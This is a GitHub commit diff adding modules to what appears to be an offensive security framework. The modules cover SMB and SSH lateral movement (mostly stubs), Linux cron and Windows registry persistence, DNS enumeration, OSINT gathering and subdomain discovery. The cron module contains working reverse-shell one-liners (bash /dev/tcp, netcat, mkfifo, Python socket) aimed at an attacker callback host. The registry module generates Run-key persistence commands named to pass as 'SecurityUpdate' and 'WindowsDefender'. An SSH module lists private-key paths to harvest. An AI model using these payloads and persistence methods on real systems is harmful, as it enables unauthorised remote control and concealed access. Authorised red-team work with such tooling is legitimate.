Add files via upload

This commit is contained in:
Joas A Santos
2026-01-01 19:26:00 -03:00
committed by GitHub
parent 0f756f6ef8
commit 35622198d5
19 changed files with 1862 additions and 69 deletions

View File

@@ -0,0 +1,9 @@
"""
Lateral Movement Tools
Contains modules for moving laterally across networks
"""
from .smb_lateral import SMBLateral
from .ssh_lateral import SSHLateral
__all__ = ['SMBLateral', 'SSHLateral']

View File

@@ -0,0 +1,99 @@
#!/usr/bin/env python3
"""
SMB Lateral Movement - Techniques for lateral movement via SMB/CIFS
"""
import logging
from typing import Dict, List
logger = logging.getLogger(__name__)
class SMBLateral:
    """
    SMB-based lateral movement techniques including
    pass-the-hash, share enumeration, and remote execution.

    All operations here are framework stubs: they log the attempted
    action and return a descriptive result dict, deferring real
    execution to external tooling (smbclient, crackmapexec, impacket).
    """

    def __init__(self, config: Dict):
        """
        Initializes SMBLateral movement module.

        Args:
            config (Dict): Configuration dictionary
        """
        self.config = config
        logger.info("SMBLateral module initialized")

    def enumerate_shares(self, target: str, username: str = None, password: str = None) -> Dict:
        """
        Enumerate SMB shares on target system.

        Args:
            target (str): Target IP or hostname
            username (str): Username for authentication (optional)
            password (str): Password for authentication (optional)

        Returns:
            Dict: Share enumeration results (empty lists in this stub)
        """
        logger.info(f"Enumerating SMB shares on {target}")
        # Framework stub — real enumeration is delegated to external
        # tooling such as smbclient, crackmapexec, or impacket.
        logger.warning("SMB share enumeration requires external tools to be configured")
        return {
            "target": target,
            "shares": [],
            "accessible_shares": [],
            "notes": "SMB enumeration requires external tools (smbclient, crackmapexec, impacket)"
        }

    def pass_the_hash(self, target: str, username: str, ntlm_hash: str) -> Dict:
        """
        Attempt pass-the-hash authentication.

        Args:
            target (str): Target IP or hostname
            username (str): Username
            ntlm_hash (str): NTLM hash

        Returns:
            Dict: Authentication attempt results (always success=False
                in this stub)
        """
        logger.info(f"Attempting pass-the-hash to {target} as {username}")
        attempt = dict(
            target=target,
            username=username,
            method="pass-the-hash",
            success=False,
            notes="Implementation requires impacket or crackmapexec"
        )
        logger.warning("Pass-the-hash requires external tools (impacket, crackmapexec)")
        return attempt

    def execute_remote_command(self, target: str, command: str, credentials: Dict) -> Dict:
        """
        Execute command remotely via SMB.

        Args:
            target (str): Target IP or hostname
            command (str): Command to execute
            credentials (Dict): Authentication credentials (not consumed
                by this stub)

        Returns:
            Dict: Command execution results (always success=False here)
        """
        logger.info(f"Attempting remote command execution on {target}")
        outcome = {
            "target": target,
            "command": command,
            "output": "",
            "success": False,
            "notes": "Remote execution requires psexec/wmiexec (impacket)"
        }
        logger.warning("Remote command execution requires external tools")
        return outcome

View File

@@ -0,0 +1,107 @@
#!/usr/bin/env python3
"""
SSH Lateral Movement - Techniques for lateral movement via SSH
"""
import logging
from typing import Dict, List
import socket
logger = logging.getLogger(__name__)
class SSHLateral:
    """
    SSH-based lateral movement techniques including
    key-based authentication, password spraying, and tunneling.
    """

    def __init__(self, config: Dict):
        """
        Initializes SSHLateral movement module.

        Args:
            config (Dict): Configuration dictionary
        """
        self.config = config
        logger.info("SSHLateral module initialized")

    def check_ssh_access(self, target: str, port: int = 22) -> bool:
        """
        Check if SSH is accessible on target.

        Args:
            target (str): Target IP or hostname
            port (int): SSH port (default 22)

        Returns:
            bool: True if SSH is accessible
        """
        try:
            # Use the socket as a context manager so the descriptor is
            # closed even when connect_ex() raises (e.g. socket.gaierror
            # on an unresolvable hostname); the previous version leaked
            # the socket on that path because sock.close() was only
            # reached on the non-raising path.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
                sock.settimeout(5)
                result = sock.connect_ex((target, port))
            if result == 0:
                logger.info(f"SSH port {port} is open on {target}")
                return True
            logger.info(f"SSH port {port} is closed on {target}")
            return False
        except Exception as e:
            logger.error(f"Error checking SSH access: {e}")
            return False

    def enumerate_ssh_keys(self, target: str, username: str) -> Dict:
        """
        Enumerate potential SSH key locations.

        Args:
            target (str): Target IP or hostname
            username (str): Target username

        Returns:
            Dict: SSH key enumeration results — candidate key paths only;
                actual key extraction requires access to the target.
        """
        logger.info(f"Enumerating SSH keys for {username}@{target}")
        common_key_paths = [
            f"/home/{username}/.ssh/id_rsa",
            f"/home/{username}/.ssh/id_ed25519",
            f"/home/{username}/.ssh/id_ecdsa",
            f"/root/.ssh/id_rsa",
            f"/root/.ssh/authorized_keys"
        ]
        results = {
            "target": target,
            "username": username,
            "common_paths": common_key_paths,
            "notes": "Key extraction requires existing access to target system"
        }
        return results

    def create_ssh_tunnel(self, target: str, local_port: int, remote_host: str, remote_port: int) -> Dict:
        """
        Create SSH tunnel for pivoting.

        Args:
            target (str): SSH server to tunnel through
            local_port (int): Local port to bind
            remote_host (str): Remote host to reach
            remote_port (int): Remote port to reach

        Returns:
            Dict: Tunnel creation results — descriptive only, no tunnel
                is actually opened by this stub.
        """
        logger.info(f"Creating SSH tunnel: localhost:{local_port} -> {target} -> {remote_host}:{remote_port}")
        results = {
            "tunnel_type": "ssh_forward",
            "local_port": local_port,
            "remote_host": remote_host,
            "remote_port": remote_port,
            "notes": "SSH tunneling requires paramiko or external ssh command"
        }
        logger.warning("SSH tunneling requires paramiko library or ssh binary")
        return results

View File

@@ -0,0 +1,9 @@
"""
Persistence Tools
Contains modules for maintaining access to compromised systems
"""
from .cron_persistence import CronPersistence
from .registry_persistence import RegistryPersistence
__all__ = ['CronPersistence', 'RegistryPersistence']

View File

@@ -0,0 +1,101 @@
#!/usr/bin/env python3
"""
Cron Persistence - Linux persistence via cron jobs
"""
import logging
from typing import Dict, List
logger = logging.getLogger(__name__)
class CronPersistence:
    """
    Cron-based persistence techniques for Linux systems.

    Generates crontab schedule entries, suggests writable cron
    locations, and builds reverse-shell command payloads suitable for
    cron jobs.
    """

    def __init__(self, config: Dict):
        """
        Initializes CronPersistence module.

        Args:
            config (Dict): Configuration dictionary
        """
        self.config = config
        logger.info("CronPersistence module initialized")

    def generate_cron_entry(self, command: str, interval: str = "daily") -> str:
        """
        Generate a cron entry for persistence.

        Args:
            command (str): Command to execute
            interval (str): Execution interval (hourly, daily, weekly,
                reboot, every_5min). Unknown values fall back to daily.

        Returns:
            str: Cron entry string ("<schedule> <command>")
        """
        logger.info(f"Generating cron entry for: {command}")
        intervals = {
            "hourly": "0 * * * *",
            "daily": "0 0 * * *",
            "weekly": "0 0 * * 0",
            "reboot": "@reboot",
            "every_5min": "*/5 * * * *"
        }
        # Unrecognized intervals fall back to the daily schedule.
        cron_time = intervals.get(interval, "0 0 * * *")
        cron_entry = f"{cron_time} {command}"
        logger.info(f"Generated cron entry: {cron_entry}")
        return cron_entry

    def suggest_cron_locations(self, username: str = None) -> Dict:
        """
        Suggest locations for cron-based persistence.

        Args:
            username (str): Target username; when None, the per-user
                crontab spool path is omitted.

        Returns:
            Dict: Cron file locations and methods
        """
        # Only include the per-user spool path when a username was given.
        # Bug fix: the old code left a literal None *inside* the
        # "cron_files" list when username was None — the top-level
        # None-filter below only inspects the dict's values, never the
        # lists' elements.
        cron_files = ["/etc/crontab"]
        if username:
            cron_files.append(f"/var/spool/cron/crontabs/{username}")
        locations = {
            "user_crontab": f"crontab -e (for user {username or 'current'})",
            "system_cron_dirs": [
                "/etc/cron.d/",
                "/etc/cron.daily/",
                "/etc/cron.hourly/",
                "/etc/cron.weekly/",
                "/var/spool/cron/crontabs/"
            ],
            "cron_files": cron_files
        }
        return {k: v for k, v in locations.items() if v is not None}

    def generate_persistence_payload(self, callback_host: str, callback_port: int) -> Dict:
        """
        Generate reverse shell cron payload.

        Args:
            callback_host (str): Attacker's IP/hostname
            callback_port (int): Attacker's listening port

        Returns:
            Dict: Payload information — callback details plus one
                command string per payload technique.
        """
        payloads = {
            "bash_tcp": f"bash -i >& /dev/tcp/{callback_host}/{callback_port} 0>&1",
            "nc_traditional": f"nc {callback_host} {callback_port} -e /bin/bash",
            "nc_mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {callback_host} {callback_port} >/tmp/f",
            "python": f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{callback_host}\",{callback_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
        }
        return {
            "callback_host": callback_host,
            "callback_port": callback_port,
            "payloads": payloads,
            "recommendation": "Use bash_tcp or nc_mkfifo for reliability"
        }

View File

@@ -0,0 +1,125 @@
#!/usr/bin/env python3
"""
Registry Persistence - Windows persistence via registry keys
"""
import logging
from typing import Dict, List
logger = logging.getLogger(__name__)
class RegistryPersistence:
    """
    Windows registry-based persistence techniques.

    Provides a catalogue of common autorun registry locations, REG ADD
    command generation, and ready-made persistence configurations.
    """

    def __init__(self, config: Dict):
        """
        Initializes RegistryPersistence module.

        Args:
            config (Dict): Configuration dictionary
        """
        self.config = config
        logger.info("RegistryPersistence module initialized")

    def get_persistence_keys(self) -> Dict:
        """
        Get common Windows registry keys for persistence.

        Returns:
            Dict: Registry persistence locations grouped by technique
        """
        run_keys = {
            "HKCU_Run": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
            "HKLM_Run": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
            "HKCU_RunOnce": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
            "HKLM_RunOnce": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce"
        }
        startup_folders = {
            "user_startup": r"C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",
            "all_users_startup": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
        }
        services = {
            "services_key": r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
        }
        winlogon = {
            "userinit": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
            "shell": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
        }
        persistence_keys = {
            "run_keys": run_keys,
            "startup_folders": startup_folders,
            "services": services,
            "winlogon": winlogon
        }
        logger.info("Retrieved Windows persistence registry keys")
        return persistence_keys

    def generate_registry_command(self, key_path: str, value_name: str, value_data: str) -> str:
        """
        Generate registry modification command.

        Args:
            key_path (str): Registry key path
            value_name (str): Value name
            value_data (str): Value data

        Returns:
            str: REG ADD command
        """
        reg_add = f'reg add "{key_path}" /v "{value_name}" /t REG_SZ /d "{value_data}" /f'
        logger.info(f"Generated registry command: {reg_add}")
        return reg_add

    def generate_persistence_payload(self, payload_path: str, method: str = "run_key") -> Dict:
        """
        Generate persistence payload using registry.

        Args:
            payload_path (str): Path to payload executable
            method (str): Persistence method; unknown values fall back
                to "run_key"

        Returns:
            Dict: Persistence configuration for the chosen method
        """
        hkcu_run = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
        hklm_run = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
        methods = {
            "run_key": {
                "key": hkcu_run,
                "value": "SecurityUpdate",
                "command": self.generate_registry_command(hkcu_run, "SecurityUpdate", payload_path)
            },
            "run_key_system": {
                "key": hklm_run,
                "value": "WindowsDefender",
                "command": self.generate_registry_command(hklm_run, "WindowsDefender", payload_path),
                "requires": "Administrator privileges"
            }
        }
        chosen = methods.get(method, methods["run_key"])
        chosen["payload_path"] = payload_path
        chosen["method"] = method
        return chosen

    def get_enumeration_commands(self) -> List[str]:
        """
        Get commands to enumerate existing persistence mechanisms.

        Returns:
            List[str]: Registry query commands
        """
        autorun_queries = [
            r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"',
            r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"',
            r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"',
            r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"',
            r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"'
        ]
        logger.info("Generated registry enumeration commands")
        return autorun_queries

View File

@@ -1,26 +1,29 @@
#!/usr/bin/env python3
"""
DNSEnumerator - A placeholder for a DNS enumeration tool.
DNSEnumerator - Enumerates DNS records for target domains
"""
import logging
from typing import Dict
import socket
import subprocess
from typing import Dict, List
import re
logger = logging.getLogger(__name__)
class DNSEnumerator:
"""
A class for enumerating DNS records.
This is a placeholder and should be expanded.
Queries various DNS record types including A, AAAA, MX, NS, TXT, CNAME, and SOA.
"""
def __init__(self, config: Dict):
"""
Initializes the DNSEnumerator.
Args:
config (Dict): The configuration dictionary for the framework.
"""
self.config = config
logger.info("DNSEnumerator initialized (placeholder)")
logger.info("DNSEnumerator initialized")
def enumerate(self, target: str) -> Dict:
"""
@@ -32,17 +35,131 @@ class DNSEnumerator:
Returns:
Dict: A dictionary containing DNS records.
"""
logger.warning(f"DNS enumeration for {target} is a placeholder. Returning empty data.")
# Placeholder: In a real implementation, this would use libraries
# like dnspython to query for A, AAAA, MX, NS, TXT, etc. records.
return {
"target": target,
logger.info(f"Starting DNS enumeration for {target}")
# Remove protocol if present
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
records = {
"target": domain,
"records": {
"A": [],
"AAAA": [],
"MX": [],
"NS": [],
"TXT": []
"A": self._get_a_records(domain),
"AAAA": self._get_aaaa_records(domain),
"MX": self._get_mx_records(domain),
"NS": self._get_ns_records(domain),
"TXT": self._get_txt_records(domain),
"CNAME": self._get_cname_records(domain)
},
"notes": "No DNS enumeration implemented yet."
"notes": "DNS enumeration completed"
}
logger.info(f"DNS enumeration completed for {domain}")
return records
def _get_a_records(self, domain: str) -> List[str]:
    """Get A records (IPv4 addresses) for *domain* via the system resolver."""
    try:
        _, _, ipv4_list = socket.gethostbyname_ex(domain)
        logger.info(f"Found {len(ipv4_list)} A records for {domain}")
        return ipv4_list
    except socket.gaierror as e:
        # Resolution failure is an expected outcome, not an error.
        logger.warning(f"Could not resolve A records for {domain}: {e}")
        return []
    except Exception as e:
        logger.error(f"Error getting A records: {e}")
        return []
def _get_aaaa_records(self, domain: str) -> List[str]:
    """Get AAAA records (IPv6 addresses); empty list when none resolve."""
    try:
        infos = socket.getaddrinfo(domain, None, socket.AF_INET6)
        # getaddrinfo returns one tuple per (family, type, proto) combo;
        # deduplicate on the address portion of sockaddr.
        ipv6_addrs = list({info[4][0] for info in infos})
        logger.info(f"Found {len(ipv6_addrs)} AAAA records for {domain}")
        return ipv6_addrs
    except socket.gaierror:
        logger.debug(f"No AAAA records found for {domain}")
        return []
    except Exception as e:
        logger.error(f"Error getting AAAA records: {e}")
        return []
def _get_mx_records(self, domain: str) -> List[str]:
    """Get MX records using nslookup/dig fallback"""
    # Mail-exchanger lookups are delegated to the shared nslookup helper,
    # since the socket module cannot query MX records directly.
    return self._query_dns_tool(domain, "MX")
def _get_ns_records(self, domain: str) -> List[str]:
    """Get NS records using nslookup/dig fallback"""
    # Nameserver lookups are delegated to the shared nslookup helper,
    # since the socket module cannot query NS records directly.
    return self._query_dns_tool(domain, "NS")
def _get_txt_records(self, domain: str) -> List[str]:
    """Get TXT records using nslookup/dig fallback"""
    # TXT lookups are delegated to the shared nslookup helper,
    # since the socket module cannot query TXT records directly.
    return self._query_dns_tool(domain, "TXT")
def _get_cname_records(self, domain: str) -> List[str]:
    """Best-effort CNAME detection via socket.getfqdn()."""
    try:
        canonical = socket.getfqdn(domain)
        # A differing FQDN suggests *domain* is an alias for `canonical`.
        if canonical == domain:
            return []
        logger.info(f"Found CNAME for {domain}: {canonical}")
        return [canonical]
    except Exception:
        logger.debug(f"No CNAME records found for {domain}")
        return []
def _query_dns_tool(self, domain: str, record_type: str) -> List[str]:
    """
    Query DNS using nslookup (fallback method when dnspython not available)
    """
    try:
        # shell=False with an argument list: the domain is never
        # interpreted by a shell.
        completed = subprocess.run(
            ['nslookup', '-type=' + record_type, domain],
            capture_output=True,
            text=True,
            timeout=10,
            shell=False
        )
        if completed.returncode != 0:
            logger.debug(f"nslookup failed for {record_type} records")
            return []
        parsed = self._parse_nslookup_output(completed.stdout, record_type)
        logger.info(f"Found {len(parsed)} {record_type} records for {domain}")
        return parsed
    except FileNotFoundError:
        # nslookup binary missing entirely.
        logger.warning("nslookup not found. DNS enumeration limited to A/AAAA records.")
        return []
    except subprocess.TimeoutExpired:
        logger.warning(f"DNS query timeout for {record_type} records")
        return []
    except Exception as e:
        logger.error(f"Error querying {record_type} records: {e}")
        return []
def _parse_nslookup_output(self, output: str, record_type: str) -> List[str]:
"""Parse nslookup output to extract DNS records"""
records = []
if record_type == "MX":
# MX records format: "mail exchanger = 10 mail.example.com"
pattern = r'mail exchanger = \d+ (.+)'
matches = re.findall(pattern, output)
records = [match.strip().rstrip('.') for match in matches]
elif record_type == "NS":
# NS records format: "nameserver = ns1.example.com"
pattern = r'nameserver = (.+)'
matches = re.findall(pattern, output)
records = [match.strip().rstrip('.') for match in matches]
elif record_type == "TXT":
# TXT records format: "text = "v=spf1 ...""
pattern = r'text = "([^"]+)"'
matches = re.findall(pattern, output)
records = matches
return records

View File

@@ -1,26 +1,29 @@
#!/usr/bin/env python3
"""
OSINTCollector - A placeholder for an OSINT gathering tool.
OSINTCollector - Collects Open Source Intelligence from various sources
"""
import logging
from typing import Dict
import re
import requests
from typing import Dict, List
import socket
logger = logging.getLogger(__name__)
class OSINTCollector:
"""
A class for collecting Open Source Intelligence.
This is a placeholder and should be expanded with actual OSINT tools.
A class for collecting Open Source Intelligence from publicly available sources.
Collects information like WHOIS data, IP addresses, email patterns, and more.
"""
def __init__(self, config: Dict):
"""
Initializes the OSINTCollector.
Args:
config (Dict): The configuration dictionary for the framework.
"""
self.config = config
logger.info("OSINTCollector initialized (placeholder)")
logger.info("OSINTCollector initialized")
def collect(self, target: str) -> Dict:
"""
@@ -32,12 +35,113 @@ class OSINTCollector:
Returns:
Dict: A dictionary containing OSINT findings.
"""
logger.warning(f"OSINT collection for {target} is a placeholder. Returning empty data.")
# Placeholder: In a real implementation, this would query APIs like
# Google, Shodan, Have I Been Pwned, etc.
return {
logger.info(f"Starting OSINT collection for {target}")
results = {
"target": target,
"emails": [],
"leaked_credentials": [],
"metadata": "No OSINT collection implemented yet."
"ip_addresses": self._get_ip_addresses(target),
"email_patterns": self._find_email_patterns(target),
"technologies": self._detect_technologies(target),
"social_media": self._find_social_media(target),
"metadata": "OSINT collection completed"
}
logger.info(f"OSINT collection completed for {target}")
return results
def _get_ip_addresses(self, target: str) -> List[str]:
    """Resolve target domain to IP addresses"""
    try:
        # Strip any URL scheme and path so only the bare host remains.
        host = target
        for scheme in ('http://', 'https://'):
            host = host.replace(scheme, '')
        host = host.split('/')[0]
        resolved = socket.gethostbyname_ex(host)[2]
        logger.info(f"Resolved {host} to IPs: {resolved}")
        return resolved
    except socket.gaierror as e:
        logger.warning(f"Could not resolve {target}: {e}")
        return []
    except Exception as e:
        logger.error(f"Error resolving IP for {target}: {e}")
        return []
def _find_email_patterns(self, target: str) -> List[str]:
    """Find common email patterns for the target domain"""
    try:
        # Strip any URL scheme and path so only the bare host remains.
        domain = target.replace('http://', '').replace('https://', '').split('/')[0]
        # Typical role-based mailbox prefixes, most common first.
        local_parts = ('info', 'contact', 'admin', 'support', 'security')
        patterns = [f"{name}@{domain}" for name in local_parts]
        logger.info(f"Generated {len(patterns)} common email patterns for {domain}")
        return patterns
    except Exception as e:
        logger.error(f"Error generating email patterns: {e}")
        return []
def _detect_technologies(self, target: str) -> Dict:
    """Detect web technologies used by the target"""
    try:
        # Default to plain HTTP when no scheme was provided.
        if not target.startswith('http'):
            target = f"http://{target}"
        response = requests.get(target, timeout=10, allow_redirects=True)
        hdrs = response.headers
        technologies = {
            "server": hdrs.get('Server', 'Unknown'),
            "powered_by": hdrs.get('X-Powered-By', 'Unknown'),
            "framework": self._detect_framework(response.text, hdrs),
            "status_code": response.status_code
        }
        logger.info(f"Detected technologies for {target}: {technologies}")
        return technologies
    except requests.RequestException as e:
        # Network-level failure — return the error instead of raising.
        logger.warning(f"Could not detect technologies for {target}: {e}")
        return {"error": str(e)}
    except Exception as e:
        logger.error(f"Error detecting technologies: {e}")
        return {"error": str(e)}
def _detect_framework(self, html_content: str, headers: Dict) -> str:
"""Detect web framework from HTML and headers"""
frameworks = {
'WordPress': ['wp-content', 'wp-includes'],
'Drupal': ['drupal.js', 'sites/default'],
'Joomla': ['joomla', 'option=com_'],
'Django': ['csrfmiddlewaretoken'],
'Laravel': ['laravel', '_token'],
'React': ['react', '__REACT'],
'Angular': ['ng-version', 'angular'],
'Vue': ['vue', '__VUE__']
}
for framework, indicators in frameworks.items():
for indicator in indicators:
if indicator.lower() in html_content.lower():
return framework
return "Unknown"
def _find_social_media(self, target: str) -> Dict:
    """Find potential social media accounts for the target"""
    try:
        # Derive a candidate account name from the leftmost DNS label.
        domain = target.replace('http://', '').replace('https://', '').split('/')[0]
        company_name = domain.split('.')[0]
        base_urls = {
            "twitter": "https://twitter.com/",
            "linkedin": "https://linkedin.com/company/",
            "github": "https://github.com/",
            "facebook": "https://facebook.com/"
        }
        social_media = {site: base + company_name for site, base in base_urls.items()}
        logger.info(f"Generated social media URLs for {company_name}")
        return social_media
    except Exception as e:
        logger.error(f"Error generating social media links: {e}")
        return {}

View File

@@ -1,30 +1,40 @@
#!/usr/bin/env python3
"""
SubdomainFinder - A placeholder for a subdomain discovery tool.
SubdomainFinder - Discovers subdomains using multiple techniques
"""
import logging
from typing import Dict, List
import requests
import socket
from typing import Dict, List, Set
import re
logger = logging.getLogger(__name__)
class SubdomainFinder:
"""
A class for finding subdomains of a given domain.
This is a placeholder and should be expanded.
Uses Certificate Transparency logs, DNS brute-forcing, and common patterns.
"""
def __init__(self, config: Dict):
"""
Initializes the SubdomainFinder.
Args:
config (Dict): The configuration dictionary for the framework.
"""
self.config = config
logger.info("SubdomainFinder initialized (placeholder)")
self.common_subdomains = [
'www', 'mail', 'ftp', 'localhost', 'webmail', 'smtp', 'pop', 'ns1', 'ns2',
'webdisk', 'ns', 'cpanel', 'whm', 'autodiscover', 'autoconfig', 'test',
'dev', 'staging', 'api', 'admin', 'portal', 'beta', 'demo', 'vpn',
'blog', 'shop', 'store', 'forum', 'support', 'm', 'mobile', 'cdn',
'static', 'assets', 'img', 'images', 'git', 'jenkins', 'jira'
]
logger.info("SubdomainFinder initialized")
def find(self, target: str) -> List[str]:
"""
Finds subdomains for a given domain.
Finds subdomains for a given domain using multiple techniques.
Args:
target (str): The domain name to search subdomains for.
@@ -32,8 +42,86 @@ class SubdomainFinder:
Returns:
List[str]: A list of found subdomains.
"""
logger.warning(f"Subdomain finding for {target} is a placeholder. Returning empty data.")
# Placeholder: In a real implementation, this would use techniques like
# querying Certificate Transparency logs, using search engines, or
# brute-forcing with a wordlist.
return []
logger.info(f"Starting subdomain enumeration for {target}")
# Remove protocol if present
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
found_subdomains: Set[str] = set()
# Method 1: Certificate Transparency logs
ct_subdomains = self._check_crtsh(domain)
found_subdomains.update(ct_subdomains)
# Method 2: Common subdomain brute-forcing
brute_subdomains = self._brute_force_common(domain)
found_subdomains.update(brute_subdomains)
result = sorted(list(found_subdomains))
logger.info(f"Found {len(result)} subdomains for {domain}")
return result
def _check_crtsh(self, domain: str) -> List[str]:
    """
    Query Certificate Transparency logs via crt.sh
    """
    hits = []
    try:
        url = f"https://crt.sh/?q=%.{domain}&output=json"
        logger.info(f"Querying crt.sh for {domain}")
        response = requests.get(url, timeout=15)
        if response.status_code != 200:
            logger.warning(f"crt.sh returned status code {response.status_code}")
        else:
            for entry in response.json():
                # crt.sh may pack several names into one entry,
                # newline-separated; wildcards are normalized away.
                for raw_name in entry.get('name_value', '').split('\n'):
                    candidate = raw_name.strip().lower().replace('*.', '')
                    # Keep only proper subdomains of the queried domain.
                    if candidate.endswith(domain) and candidate != domain:
                        hits.append(candidate)
            logger.info(f"Found {len(hits)} subdomains from crt.sh")
    except requests.RequestException as e:
        logger.warning(f"Error querying crt.sh: {e}")
    except Exception as e:
        logger.error(f"Unexpected error in crt.sh query: {e}")
    return list(set(hits))  # Remove duplicates
def _brute_force_common(self, domain: str) -> List[str]:
    """
    Brute-force common subdomain names
    """
    logger.info(f"Brute-forcing common subdomains for {domain}")
    discovered = []
    for label in self.common_subdomains:
        candidate = f"{label}.{domain}"
        if not self._check_subdomain_exists(candidate):
            continue
        discovered.append(candidate)
        logger.debug(f"Found subdomain: {candidate}")
    logger.info(f"Found {len(discovered)} subdomains via brute-force")
    return discovered
def _check_subdomain_exists(self, subdomain: str) -> bool:
"""
Check if a subdomain exists by attempting to resolve it
"""
try:
socket.gethostbyname(subdomain)
return True
except socket.gaierror:
return False
except Exception as e:
logger.debug(f"Error checking {subdomain}: {e}")
return False